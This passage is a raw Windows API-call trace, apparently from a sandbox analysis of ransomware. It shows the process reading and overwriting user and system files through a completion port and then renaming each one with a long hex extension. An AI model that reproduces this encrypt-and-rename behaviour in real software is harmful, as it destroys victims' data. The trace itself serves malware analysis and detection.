lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.832] ReadFile (in: hFile=0x58c, lpBuffer=0x7410188, nNumberOfBytesToRead=0x3c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050) returned 1 [0156.837] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.838] WriteFile (in: hFile=0x58c, lpBuffer=0x7410188*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050) returned 1 [0156.842] RtlInterlockedCompareExchange64 () returned 0x0 [0156.842] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.843] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73f0100, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x73f0100, ReturnLength=0x702fa7c) returned 0x0 [0156.845] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", lpString2=".33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D" [0156.845] GetProcessHeap () returned 0x270000 [0156.845] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x4279f18 [0156.849] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x702fa6c, FileInformation=0x4279f18, Length=0x126, FileInformationClass=0xa) returned 0x0 [0156.852] CloseHandle (hObject=0x58c) returned 1 [0156.855] GetProcessHeap () returned 0x270000 [0156.857] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.857] RtlInterlockedCompareExchange64 () returned 0x1 [0156.857] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.861] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.861] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.862] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.863] RtlInterlockedCompareExchange64 () returned 0x0 [0156.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.864] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0156.866] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", lpString2=".CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C" [0156.866] GetProcessHeap () returned 0x270000 [0156.866] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x365e70 [0156.866] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x702fa6c, FileInformation=0x365e70, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0156.871] CloseHandle (hObject=0x598) returned 1 [0156.882] GetProcessHeap () returned 0x270000 [0156.883] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0156.883] RtlInterlockedCompareExchange64 () returned 0x1 [0156.883] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.980] ReadFile (in: hFile=0x58c, lpBuffer=0x7410188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050) returned 1 [0156.981] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.984] WriteFile (in: hFile=0x58c, lpBuffer=0x7410188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050) returned 1 [0156.986] RtlInterlockedCompareExchange64 () returned 0x0 [0156.986] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.989] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0156.990] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpString2=".C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B" [0156.990] GetProcessHeap () returned 0x270000 [0156.990] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x146) returned 0x42573f8 [0156.990] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x702fa6c, FileInformation=0x42573f8, Length=0x146, FileInformationClass=0xa) returned 0x0 [0156.994] CloseHandle (hObject=0x4a8) returned 1 [0157.088] GetProcessHeap () returned 0x270000 [0157.089] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0157.090] RtlInterlockedCompareExchange64 () returned 0x2 [0157.090] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0158.514] ReadFile (in: hFile=0x5a4, lpBuffer=0x7410188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73f0050) returned 1 [0158.516] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0159.452] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x2e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0159.453] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0159.455] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x7422118, ReturnLength=0x702fa7c) returned 0x0 [0159.456] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", lpString2=".5E97B4FB87319F0811FB25901CC215AC0745989DDA3D04F57872F9552B20173E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.5E97B4FB87319F0811FB25901CC215AC0745989DDA3D04F57872F9552B20173E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.5E97B4FB87319F0811FB25901CC215AC0745989DDA3D04F57872F9552B20173E" [0159.456] GetProcessHeap () returned 0x270000 [0159.456] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x3237a0 [0159.456] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x702fa6c, FileInformation=0x3237a0, Length=0x150, FileInformationClass=0xa) returned 0x0 [0159.458] CloseHandle (hObject=0x590) returned 1 [0159.461] GetProcessHeap () returned 0x270000 [0159.463] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.463] RtlInterlockedCompareExchange64 () returned 0x3 [0159.463] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.050] WriteFile (in: hFile=0x5b4, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0160.076] RtlInterlockedCompareExchange64 () returned 0x2 [0160.076] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.178] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x744a270, ReturnLength=0x702fa7c) returned 0x0 [0160.179] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif", lpString2=".0F3543C772ECECBAD798663A16AD3391CCA8A065343FB7B35250599DEB80E350" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif.0F3543C772ECECBAD798663A16AD3391CCA8A065343FB7B35250599DEB80E350") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif.0F3543C772ECECBAD798663A16AD3391CCA8A065343FB7B35250599DEB80E350" [0160.179] GetProcessHeap () returned 0x270000 [0160.179] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x74204e8 [0160.180] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x702fa6c, FileInformation=0x74204e8, Length=0x168, FileInformationClass=0xa) returned 0x0 [0160.182] CloseHandle (hObject=0x5ac) returned 1 [0160.205] GetProcessHeap () returned 0x270000 [0160.206] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0160.206] RtlInterlockedCompareExchange64 () returned 0x3 [0160.206] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.334] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x73e00f8, ReturnLength=0x702fa7c) returned 0x0 [0160.336] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat", lpString2=".B3FF4984F09C1FA30C111C32D08D831EEE86F4EE4B3BD49D0E32096605DAC157" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat.B3FF4984F09C1FA30C111C32D08D831EEE86F4EE4B3BD49D0E32096605DAC157") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat.B3FF4984F09C1FA30C111C32D08D831EEE86F4EE4B3BD49D0E32096605DAC157" [0160.336] GetProcessHeap () returned 0x270000 [0160.336] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x174) returned 0x427a9f0 [0160.336] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x702fa6c, FileInformation=0x427a9f0, Length=0x174, FileInformationClass=0xa) returned 0x0 [0160.338] CloseHandle (hObject=0x5a8) returned 1 [0160.371] GetProcessHeap () returned 0x270000 [0160.373] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0160.374] RtlInterlockedCompareExchange64 () returned 0x1 [0160.374] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.445] ReadFile (in: hFile=0x5a8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0160.445] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.476] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0160.476] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.511] ReadFile (in: hFile=0x5ac, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0160.511] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.526] ReadFile (in: hFile=0x594, lpBuffer=0x7552400, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8) returned 1 [0160.526] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0160.572] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74723c8, ReturnLength=0x702fa7c) returned 0x0 [0160.573] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll", lpString2=".CD44A9B187B8A7431FC5340CA921296F315E66D6536A7A5A0146688C7C30D842" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll.CD44A9B187B8A7431FC5340CA921296F315E66D6536A7A5A0146688C7C30D842") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll.CD44A9B187B8A7431FC5340CA921296F315E66D6536A7A5A0146688C7C30D842" [0160.573] GetProcessHeap () returned 0x270000 [0160.573] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x172) returned 0x427ab78 [0160.573] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x702fa6c, FileInformation=0x427ab78, Length=0x172, FileInformationClass=0xa) returned 0x0 [0160.921] CloseHandle (hObject=0x5b4) returned 1 [0161.005] GetProcessHeap () returned 0x270000 [0161.007] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0161.016] RtlInterlockedCompareExchange64 () returned 0x5 [0161.016] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0163.958] ReadFile (in: hFile=0x5ac, lpBuffer=0x752a2a8, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170) returned 1 [0163.959] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0163.963] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74723c8, ReturnLength=0x702fa7c) returned 0x0 [0163.964] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg", lpString2=".3E7ECEF8890AE38CD6560864B1320BD9C2098CDC90ABA4D2B077397B348BFC45" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.3E7ECEF8890AE38CD6560864B1320BD9C2098CDC90ABA4D2B077397B348BFC45") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.3E7ECEF8890AE38CD6560864B1320BD9C2098CDC90ABA4D2B077397B348BFC45" [0163.964] GetProcessHeap () returned 0x270000 [0163.964] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x162) returned 0x7421220 [0163.964] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x702fa6c, FileInformation=0x7421220, Length=0x162, FileInformationClass=0xa) returned 0x0 [0163.981] CloseHandle (hObject=0x5b0) returned 1 [0163.984] GetProcessHeap () returned 0x270000 [0163.986] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0163.988] RtlInterlockedCompareExchange64 () returned 0x2 [0163.988] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0164.416] ReadFile (in: hFile=0x590, lpBuffer=0x7610188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75f0050 | out: lpBuffer=0x7610188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75f0050) returned 1 [0164.417] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0164.417] NtQueryObject (in: Handle=0x5c0, ObjectInformationClass=0x1, ObjectInformation=0x75aa780, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x75aa780, ReturnLength=0x702fa7c) returned 0x0 [0164.418] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png", lpString2=".D1C20EB7ACBA60496684519FE7342F4C8BF075A5536EBAF1E9A6785B7140DF12" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png.D1C20EB7ACBA60496684519FE7342F4C8BF075A5536EBAF1E9A6785B7140DF12") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png.D1C20EB7ACBA60496684519FE7342F4C8BF075A5536EBAF1E9A6785B7140DF12" [0164.418] GetProcessHeap () returned 0x270000 [0164.418] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425cf28 [0164.418] NtSetInformationFile (FileHandle=0x5c0, IoStatusBlock=0x702fa6c, FileInformation=0x425cf28, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.420] CloseHandle (hObject=0x5c0) returned 1 [0164.425] GetProcessHeap () returned 0x270000 [0164.427] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa6d0 | out: hHeap=0x270000) returned 1 [0164.682] RtlInterlockedCompareExchange64 () returned 0x6 [0164.682] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0165.976] WriteFile (in: hFile=0x598, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0165.978] RtlInterlockedCompareExchange64 () returned 0x2 [0165.978] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.866] ReadFile (in: hFile=0x5e4, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0167.870] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0167.871] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x7422118, ReturnLength=0x702fa7c) returned 0x0 [0167.872] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3", lpString2=".DF270314374DBF3B8E8924DD94FC5F8067466B6E0B5ECDD5CC48D75F24E50C18" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3.DF270314374DBF3B8E8924DD94FC5F8067466B6E0B5ECDD5CC48D75F24E50C18") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3.DF270314374DBF3B8E8924DD94FC5F8067466B6E0B5ECDD5CC48D75F24E50C18" [0167.873] GetProcessHeap () returned 0x270000 [0167.873] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x4263820 [0167.873] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x702fa6c, FileInformation=0x4263820, Length=0x136, FileInformationClass=0xa) returned 0x0 [0167.878] CloseHandle (hObject=0x5e4) returned 1 [0167.879] GetProcessHeap () returned 0x270000 [0167.881] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0167.883] RtlInterlockedCompareExchange64 () returned 0x1 [0167.883] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: 